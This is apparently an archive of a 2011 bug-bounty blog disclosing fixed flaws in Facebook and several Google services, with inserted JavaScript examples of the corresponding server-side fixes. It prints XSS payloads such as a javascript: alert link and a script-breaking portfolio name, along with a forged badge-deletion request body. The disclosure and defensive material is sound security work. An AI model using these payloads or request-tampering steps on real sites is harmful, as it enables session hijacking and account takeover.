<span style="color: orange;"><b>bid</b></span>=3098&<span style="color: orange;"><b>owner_id</b></span>=1403380007&<span style="color: orange;"><b>post_form_id</b></span>=073ca00487f1c8fb8903a6ff04ed57be&<span style="color: orange;"><b>fb_dtsg</b></span>=4xsur&<span style="color: orange;"><b>lsd</b></span>&<span style="color: orange;"><b>post_form_id_source</b></span>=AsyncRequest&<span style="color: orange;"><b>confirmed</b></span>=1</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
<br /></div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
The badge is then successfully deleted from the victim's account.</div>
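As an added illustration, which is neither Facebook's code nor part of the original post: the server-side fix for this class of bug is to ignore the client's owner_id entirely and check, against the authenticated session and a server-side record, that the caller actually owns the badge before deleting it, in addition to verifying the anti-CSRF token. The store, session table, token names and request bodies below are constructed for the example.

```javascript
// Added example (not Facebook's code): a badge-deletion handler that derives ownership
// from the authenticated session and the server-side record, never from the client's
// "owner_id" field. Store, sessions, token names and request bodies are constructed.

// Constructed store: badge id -> owner user id (reseeded by resetStore()).
const badges = new Map();
function resetStore() {
  badges.clear();
  badges.set('3098', '1403380007'); // the victim's badge from the captured request
  badges.set('4111', '2000000001'); // a badge owned by the attacker's own account
}

// Constructed sessions: cookie value -> authenticated user and its anti-CSRF token
// (the token plays the role that fb_dtsg / post_form_id play in the captured request).
const sessions = new Map([
  ['victim-cookie',   { userId: '1403380007', csrfToken: 'tok-victim' }],
  ['attacker-cookie', { userId: '2000000001', csrfToken: 'tok-attacker' }],
]);

// Compare two tokens without short-circuiting on the first differing byte.
function constantTimeEqual(a, b) {
  const x = String(a), y = String(b);
  let diff = x.length ^ y.length;
  for (let i = 0; i < Math.max(x.length, y.length); i++) {
    diff |= (x.charCodeAt(i) || 0) ^ (y.charCodeAt(i) || 0);
  }
  return diff === 0;
}

// Handle one POST body (application/x-www-form-urlencoded). Returns { status, reason }.
function deleteBadge(cookie, body) {
  const session = sessions.get(cookie);
  if (!session) return { status: 401, reason: 'not authenticated' };

  const params = Object.fromEntries(new URLSearchParams(body));
  // 1. Anti-CSRF: the submitted token must match the one bound to this session.
  if (!params.fb_dtsg || !constantTimeEqual(params.fb_dtsg, session.csrfToken)) {
    return { status: 403, reason: 'csrf token mismatch' };
  }
  // 2. Authorization: look the badge up server-side and compare its owner with the
  //    session user. params.owner_id is intentionally never read.
  const owner = badges.get(params.bid);
  if (owner === undefined) return { status: 404, reason: 'no such badge' };
  if (owner !== session.userId) return { status: 403, reason: 'badge belongs to another user' };

  badges.delete(params.bid);
  return { status: 200, reason: 'deleted' };
}

// Replays three constructed requests modelled on the captured packet.
function demo() {
  resetStore();
  const forged = 'bid=3098&owner_id=1403380007&fb_dtsg=tok-attacker&confirmed=1';
  const own    = 'bid=4111&owner_id=2000000001&fb_dtsg=tok-attacker&confirmed=1';
  const noTok  = 'bid=4111&owner_id=2000000001&fb_dtsg=guess&confirmed=1';
  return {
    forged: deleteBadge('attacker-cookie', forged), // 403: owner_id in the body changes nothing
    own:    deleteBadge('attacker-cookie', own),    // 200: deleting your own badge still works
    noTok:  deleteBadge('attacker-cookie', noTok),  // 403: wrong anti-CSRF token
    victimBadgeIntact: badges.has('3098'),          // true
  };
}

console.log(demo());
```

The point to take from the handler is the order of checks: authentication, then the anti-CSRF token, then a server-side ownership lookup keyed only by the badge id; the owner_id the client sends is never consulted, so manipulating it has no effect.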
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
<br />
<div style="text-align: center;">
<object height="344" width="425"><param name="movie" value="http://www.youtube.com/v/OoDzPZCh6vk?hl=en&fs=1&fmt=35"></param>
<param name="allowFullScreen" value="true"></param>
<param name="allowscriptaccess" value="always"></param>
<embed src="http://www.youtube.com/v/OoDzPZCh6vk?hl=en&fs=1&fmt=35" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></div>
<br />
The Facebook team fixed this issue and thanked me by adding my name to the Facebook WhiteHats thank-you list: <a href="http://www.facebook.com/whitehat">Facebook Security WhiteHats</a><br />
<br /></div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Best Regards,</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Ben Hayak </div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com3tag:blogger.com,1999:blog-7534521580510357281.post-67478895772139481722011-04-02T18:56:00.006+03:002011-04-04T13:14:06.325+03:00Google Security Vulnerability Reward Program: Google Adwords Billing poisoning<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><span class="Apple-style-span" style="color: #cccccc; font-size: large;">Overview</span><span class="Apple-style-span" style="color: #999999;">: </span><br />
<div style="direction: ltr; text-align: left;"><a href="http://www.google.com/adwords" target="_blank">Google Adwords</a>, Google's online advertising service for boosting website traffic and sales, was vulnerable to a <b>persistent</b> XSS in the billing information.<br />
<br />
</div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;">What Had to be done?</span></span><br />
<span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;"></span></span><span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif; font-size: large; line-height: 14px;"> </span></div>The billing information details were vulnerable to a persistent XSS in 5 different fields.<br />
The locations were:<br />
Business name,<br />
Contact name,<br />
both Street Address fields, and City.<br />
The attack was performed by editing the billing information with the right XSS payload (no special bypass required).<br />
<b>This XSS is so persistent that it isn't possible even for the administrator to delete the poisoned billing information.</b><br />
<b><br />
</b><br />
Screenshot:<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTsj0bv-7IdSrB_axXb8RszyYszW0WBF8Rm-XAKDzEN035g3R7hFB8sPXRHRqu74K3B06zKY5lmNUdw9ZBizYXbVxIlXgk0sKKCDBg-FaetztjItdUUd-cdwIeqnzSkeWF1HPQQcI1HfE/s1600/google+adwords-billing.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTsj0bv-7IdSrB_axXb8RszyYszW0WBF8Rm-XAKDzEN035g3R7hFB8sPXRHRqu74K3B06zKY5lmNUdw9ZBizYXbVxIlXgk0sKKCDBg-FaetztjItdUUd-cdwIeqnzSkeWF1HPQQcI1HfE/s320/google+adwords-billing.jpg" width="320" /></a></div><br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">This issue has been fixed by Google security team.</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><br />
</div><div class="separator" style="clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;"></div></div><div dir="ltr" trbidi="on">I appreciate the opportunity to preserve my skills and gain some more experience.<br />
Thank you Google security team.</div></div></div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com2tag:blogger.com,1999:blog-7534521580510357281.post-18129289690580551242011-03-22T21:35:00.002+02:002011-04-02T19:11:17.951+03:00Google Security Vulnerability Reward Program: Take Control Over Adwords Service!<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><span class="Apple-style-span" style="color: #cccccc; font-size: large;">Overview</span><span class="Apple-style-span" style="color: #999999;">: </span><br />
<div style="direction: ltr; text-align: left;"><a href="http://www.google.com/adwords" target="_blank">Google Adwords</a>, Google's online advertising service for boosting website traffic and sales, was vulnerable to a <b>persistent</b> XSS in the main page Dashboard!<br />
<br />
</div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;">What Had to be done?</span></span><br />
<span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;"><br />
</span></span></div>Well, here I discovered that the Dashboard page stored the Campaigns and the Ad groups as 'widgets', so I went for it and found it was vulnerable. The target of this attack could be anyone in the Adwords service, whether with 'read only', 'standard' or 'Administrator' access. Of course, a member who can edit/add Campaigns could take control over the administrator's account and perform actions with administrator permissions; for example, with a malicious JavaScript payload the attacker could make the administrator grant the attacker admin access, without any user interaction from the administrator. The attack triggers as soon as the admin, or any other victim, enters the Adwords service. This way I could perform session hijacking or <b>take control over the account.</b><br />
<br />
Image triggering the XSS at<br />
Vulnerable location #1 (Campaign):<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMp16C71P3zv95JU7QdWE7eC8ApKVgyUmhY_SxNrt9W8VS4_sAHw8M0k6tLhV9sIjhyphenhyphen8ExJGbi0_gMyEBX7wlvBfpKN1LDtHOjNQS4fwlxS3aB6uBdWMM-dKfpVmg5euCesiVsIio5ygY/s1600/google+adwords-new-camp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"target="_blank"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMp16C71P3zv95JU7QdWE7eC8ApKVgyUmhY_SxNrt9W8VS4_sAHw8M0k6tLhV9sIjhyphenhyphen8ExJGbi0_gMyEBX7wlvBfpKN1LDtHOjNQS4fwlxS3aB6uBdWMM-dKfpVmg5euCesiVsIio5ygY/s400/google+adwords-new-camp.jpg" width="400" /></a></div><br />
<br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">Vulnerable location #2 (Ad Group):</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOkDBVknjtAOE5c8eq9Av6IAFp-rczBaj54XXKfxaOfGTI4mToanrWnrRPaWu-dPL_FyJEHKXIcabzb41DmnIBGuOsF2yqDRIMmVUKFg1laCQGJW38a2sCeFP6mxZCXZc10hrta30yDwk/s1600/google+adwords-ad-group.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"target="_blank"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOkDBVknjtAOE5c8eq9Av6IAFp-rczBaj54XXKfxaOfGTI4mToanrWnrRPaWu-dPL_FyJEHKXIcabzb41DmnIBGuOsF2yqDRIMmVUKFg1laCQGJW38a2sCeFP6mxZCXZc10hrta30yDwk/s400/google+adwords-ad-group.jpg" width="400" /></a></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><br />
</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">This issue has been fixed by Google security team.</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><br />
</div><div class="separator" style="clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;"></div></div><div dir="ltr" trbidi="on">I appreciate the opportunity to preserve my skills and gain some more experience.<br />
Thank you Google security team.</div></div></div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com0tag:blogger.com,1999:blog-7534521580510357281.post-74149363034716387822011-02-27T17:03:00.008+02:002011-03-03T10:28:56.426+02:00Google Security Vulnerability Reward Program: Google Website Optimizer - Stored XSS<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><span class="Apple-style-span" style="color: #cccccc; font-size: large;">Overview</span><span class="Apple-style-span" style="color: #999999;">: </span><br />
<div style="direction: ltr; text-align: left;"><a href="http://www.google.com/websiteoptimizer" target="_blank">Google Website Optimizer</a>, Google's free website testing and optimization tool, missed a very important check when people create their experiments. Additionally, they made it even easier to exploit.<br />
<br />
</div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;">What Had to be done?</span></span><br />
<span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;"><br />
</span></span></div>The first step was creating a new experiment; I preferred an A/B Experiment. Then I had an option to add URLs to verify that my website is real. At first I inserted some string, "BenHayak" for example, and pressed continue.<br />
After that screen I had an option to hand the dirty job over to my "Webmaster" - "Your Webmaster will install and do the dirty work for you ;)". Great, they gave me a link to a Google domain validation page with links to <a href="http://www.blogger.com/post-edit.g?blogID=7534521580510357281&postID=7414936303471638782#">BenHayak</a>; when I clicked it I noticed it opened a page with only "BenHayak" in the address bar.<br />
Then I made another Experiment filled with many javascript:alert('BenHayak'); links and sent this stored XSS report along with a recommendation to always check for "http://" in the input.<br />
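As an added example, which is not Google's code and not from the original post: the check recommended above, done by parsing the URL rather than searching for the substring "http://" (a substring check still passes inputs such as a javascript: URL that merely contains "http://" later on). The function names and sample inputs are constructed.

```javascript
// Added example (not Google's code): validating a user-supplied website URL before it is
// used as a link target. Function names and sample inputs are constructed for this example.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Returns the normalised absolute URL when the input is a plain http(s) URL, else null.
// The WHATWG parser lowercases the scheme and strips leading/trailing whitespace and
// control characters, so case and padding tricks around "javascript:" do not help, and a
// bare string such as "BenHayak" is rejected because it has no scheme at all.
function safeHttpUrl(input) {
  if (typeof input !== 'string') return null;
  let url;
  try {
    url = new URL(input); // no base URL on purpose: relative inputs must fail
  } catch {
    return null;
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;
  if (url.username || url.password) return null; // refuse "https://trusted.example@evil.example"
  return url.href;
}

// Run a batch of inputs through the check; returns one { input, accepted } row per input.
function classify(inputs) {
  return inputs.map((s) => ({ input: s, accepted: safeHttpUrl(s) }));
}

// Constructed samples.
const SAMPLES = [
  'BenHayak',                         // what the report entered first: not a URL at all
  "javascript:alert('BenHayak')",     // the stored payload from the report
  ' JaVaScRiPt:alert(1)',             // case and leading whitespace are normalised away
  'data:text/html;base64,AAAA',       // another non-http scheme
  'https://www.example.com/page?x=1', // accepted, returned as-is
  'http://example.com',               // accepted, normalised to http://example.com/
];

console.log(classify(SAMPLES));
```

When the validated value is later written into an href attribute it still has to be HTML-attribute-escaped; the scheme check and the output encoding are two separate layers.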
<br />
PoC link: <a href="https://www.google.com/analytics/siteopt/ab_install_instructions?experiment=EAAAABakGLUhKf2ff8bP4hP8DPs&account=20970990&user=AN_xLxejwJA6E2ghVnirghhyZv1AG-g3Eg&hl=iw&portal=0&t=HePW_hzZ6hA" target="_blank">Click to trigger the stored XSS alert</a><br />
<br />
Image triggering the XSS:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNqcJHpQjN9r2CbTQyvVeRd0npjyc5TNqJDP68gORe2nqbD3NMTrhyphenhyphenhSEcwsp1tWTB_plRsTzmYYvxK3KDF2Svr-PLoqL16k93jB6RBSit8p_1R5UqpqkDvY-J5EePw_FxIeelKlrzfg0/s1600/website+optimizer.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNqcJHpQjN9r2CbTQyvVeRd0npjyc5TNqJDP68gORe2nqbD3NMTrhyphenhyphenhSEcwsp1tWTB_plRsTzmYYvxK3KDF2Svr-PLoqL16k93jB6RBSit8p_1R5UqpqkDvY-J5EePw_FxIeelKlrzfg0/s320/website+optimizer.jpg" width="320" /></a></div><br />
<br />
</div><div dir="ltr" trbidi="on">I appreciate the opportunity to preserve my skills and gain some more experience.<br />
Thank you Google security team.</div></div></div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com1tag:blogger.com,1999:blog-7534521580510357281.post-55282202135151057822011-02-27T16:22:00.000+02:002011-02-27T16:22:45.513+02:00UpdatesWell, It's been couple of weeks since I wanted to update the blog with<br />
new vulnerabilities I found in Google products.<br />
But as of now these bugs aren't fixed yet,<br />
I will publish them soon, after Google fixes the issues.<br />
<br />
Best regards,<br />
Ben Hayak[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com1tag:blogger.com,1999:blog-7534521580510357281.post-71685155946358509402011-02-17T00:35:00.049+02:002011-04-19T11:28:02.551+03:00Google Security Vulnerability Reward Program: Google Bookmarks Stored XSS<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><span class="Apple-style-span" style="color: #cccccc; font-size: large;">Overview</span><span class="Apple-style-span" style="color: #999999;">: </span><br />
<div style="direction: ltr; text-align: left;"><a href="https://www.google.com/bookmarks/l" target="_blank">Google Bookmarks</a> <span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">lets you create online bookmark lists.</span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 14px;"> I found this one in the "New Section" function. For this XSS to trigger, though, the victim had to edit your section.</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 14px;"><br />
</span></div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;">What Had to be done?</span></span><br />
<span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;"><br />
</span></span></div>The first step was creating a new bookmark list. After I got that done, I created a New section with an Image tag poisoned with an XSS payload. The final step was inviting the victim by giving him/her access to my bookmarks list.<br />
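Added example, neither Google's code nor part of the original posts: the render-time escaping that neutralises stored payloads of the kind described in the Adwords billing post above and in the poisoned section name here. A stored field is escaped every time it is written into markup, so the content of the database no longer matters. Field names, the record shape and the sample payload are constructed for the example.

```javascript
// Added example (not Google's code): output encoding for stored, user-controlled strings
// such as billing fields and bookmark section names. Function names, the record shape and
// the sample payload are constructed for this example.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Escape a value for an HTML text node or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

const BILLING_FIELDS = ['businessName', 'contactName', 'street1', 'street2', 'city'];

// The pattern behind a stored XSS: stored text concatenated straight into markup.
function renderBillingRowUnsafe(record) {
  return '<tr>' + BILLING_FIELDS.map((f) => `<td>${record[f] ?? ''}</td>`).join('') + '</tr>';
}

// Hardened: every field is escaped at render time, whatever was accepted on input.
function renderBillingRow(record) {
  return '<tr>' + BILLING_FIELDS.map((f) => `<td>${escapeHtml(record[f] ?? '')}</td>`).join('') + '</tr>';
}

// A section name that lands both in a text node and in a quoted attribute; the same
// escaping covers both contexts, provided the attribute is always quoted.
function renderSectionHeader(section) {
  const name = escapeHtml(section.name);
  return `<h2 data-section="${name}">${name}</h2>`;
}

// Constructed sample record carrying a stored payload.
const SAMPLE_RECORD = {
  businessName: 'Acme <img src=x onerror=alert(1)>',
  contactName: 'O\'Brien "Bob"',
  street1: '1 Main St',
  street2: '',
  city: 'Tel Aviv',
};

function demo() {
  return {
    unsafe: renderBillingRowUnsafe(SAMPLE_RECORD),
    safe: renderBillingRow(SAMPLE_RECORD),
    header: renderSectionHeader({ name: '"><img src=x onerror=alert(1)>' }),
  };
}

console.log(demo());
```

Note that escaping is only half of the Adwords story: the post also reports that the administrator could not delete the poisoned record, so the edit and delete views needed the same treatment as the display view, otherwise the payload fires in the very screen meant to remove it.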
<div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
</div><div dir="ltr" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMWRGKn1x21tyYgXxPOEbDCeq0zb-GgTq2OaJ5kdHtQAnnNxQh6S0XZLYzQeJrQ7eAjKYrBY_iEqra_sM-7SLyTf0cz40AWXvPnB2_c1ujSceIFObDtnd9zdr8_6T8iPKdiaP0HTzpP4M/s1600/bookmarks.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMWRGKn1x21tyYgXxPOEbDCeq0zb-GgTq2OaJ5kdHtQAnnNxQh6S0XZLYzQeJrQ7eAjKYrBY_iEqra_sM-7SLyTf0cz40AWXvPnB2_c1ujSceIFObDtnd9zdr8_6T8iPKdiaP0HTzpP4M/s400/bookmarks.jpg" width="400" /></a></div><br />
<div dir="ltr" trbidi="on"><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">This issue has been fixed by Google security team.</div></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><br />
</div></div><div class="separator" style="clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;"></div></div><div dir="ltr" trbidi="on"><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">I appreciate the opportunity to preserve my skills and gain some more experience</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">Thank you Google security team.</div></div></div></div></div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com0tag:blogger.com,1999:blog-7534521580510357281.post-31321203946434358492011-02-16T16:40:00.013+02:002011-04-02T19:10:51.928+03:00Google Security Vulnerability Reward Program: Google Finance Stored XSS<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" trbidi="on"><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="color: #cccccc; font-size: large;">Overview</span><span class="Apple-style-span" style="color: #999999;">: </span></div><div style="direction: ltr; text-align: left;"><a href="http://www.google.com/finance" target="_blank">Google Finance</a> <span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">lets you create </span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 14px;">Portfolios. After a few tries I figured a method to </span></div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 14px;">Trigger XSS using portfolio name.</span></span></div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 14px;"><br />
</span></span></div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;">What Had to be done?</span></span><br />
<span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;"><br />
</span></span></div>OK, at first I used different payloads in the Portfolio name but nothing triggered,<br />
but after some more research I found that, after I create my Portfolio with the payload and click on one of the Deposit / Withdraw options, my Portfolio name is inserted into this function:</div><div dir="ltr" trbidi="on"><pre class="Cpp" name="code">function initPage() {
initVars();
dview = google.finance.portfolio.init({
id: '8',
expected_hash: 'U66jb3VTR2ZPUjgtaXJqaXRZc2s33VNmVWdjfDEyOTc4NzE22NDk',
edition: 'us',
name: '--XSS PAYLOAD--',
currency: 'USD'
}, true,
'/finance/s/7skxqAM7Z8M/chart9.swf?hl=en&gl=us',
true
,
false,
''
);
</pre><span class="Apple-style-span" style="color: #d5a6bd;">name: '<b>--XSS PAYLOAD--</b>'</span>, so I inserted this payload as the portfolio name: &lt;/script&gt;&lt;body onload=alert(1)&gt;. There was a filter: when you insert &lt;/script&gt;, the server removed everything before the &lt;/script&gt;.<br />
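Added example, neither Google's code nor from the original post: the difference between pasting the portfolio name straight into a JavaScript string literal, which is effectively what the initPage() output above does, and emitting it as a JSON literal whose angle brackets are escaped, so that the sequence "&lt;/script&gt;" can never appear inside the script element. The filter described above acted on the input; encoding at the output point treats every payload the same way. Function names and the sample payload are constructed.

```javascript
// Added example (not Google's code): embedding a user-controlled string inside an inline
// <script> block. The vulnerable form concatenates the raw value into a JS string literal;
// the hardened form JSON-encodes it and escapes the characters that can end the script
// element or break the literal. Function names and the sample payload are constructed.

// Vulnerable: same shape as the captured initPage(), the name goes straight into the source.
// The HTML parser finds the first "</script>" and closes the block, regardless of JS quoting.
function renderInitScriptUnsafe(portfolioName) {
  return `<script>dview = init({ name: '${portfolioName}' });</script>`;
}

// JSON-encode, then turn '<', '>', '&' and the U+2028/U+2029 line terminators into \uXXXX
// escapes. JSON.stringify already handles quotes and backslashes; the extra pass guarantees
// that "</script>" and "<!--" cannot occur in the emitted literal. The JS engine decodes the
// \u escapes back to the original characters, so the application sees the same name.
function toJsLiteral(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened: the literal is always double-quoted JSON, never spliced between single quotes.
function renderInitScript(portfolioName) {
  return `<script>dview = init({ name: ${toJsLiteral(portfolioName)} });</script>`;
}

// Constructed payload of the shape reported above.
const PAYLOAD = '</script><body onload=alert(1)>';

function demo() {
  return {
    unsafe: renderInitScriptUnsafe(PAYLOAD),
    safe: renderInitScript(PAYLOAD),
    literal: toJsLiteral(PAYLOAD), // "\u003c/script\u003e\u003cbody onload=alert(1)\u003e"
  };
}

console.log(demo());
```

Counting occurrences of the closing tag in each output is a quick way to see the difference: the unsafe rendering contains two, the second of which is the real one, while the hardened rendering contains exactly one.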
<div class="separator" style="clear: both; text-align: center;"></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrTzBEjydurKb-H6lkTK5Gc_ws28NroyQa_u3Q2yyCnCHY5lTWVZ04Enai9ZKbOUNoSVbhFKwCeAUr5O_u3eubNEpy2UTZr5qXjH_yOEwnyoWrlPX3M5hvRtaonoRonGA3vWZc1KhQWT8/s1600/google-finance-for-blog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"target="_blank"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrTzBEjydurKb-H6lkTK5Gc_ws28NroyQa_u3Q2yyCnCHY5lTWVZ04Enai9ZKbOUNoSVbhFKwCeAUr5O_u3eubNEpy2UTZr5qXjH_yOEwnyoWrlPX3M5hvRtaonoRonGA3vWZc1KhQWT8/s400/google-finance-for-blog.jpg" width="400" /></a></div><br />
I appreciate the opportunity to preserve my skills and gain some more experience.<br />
Thank you Google security team.</div></div></div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com4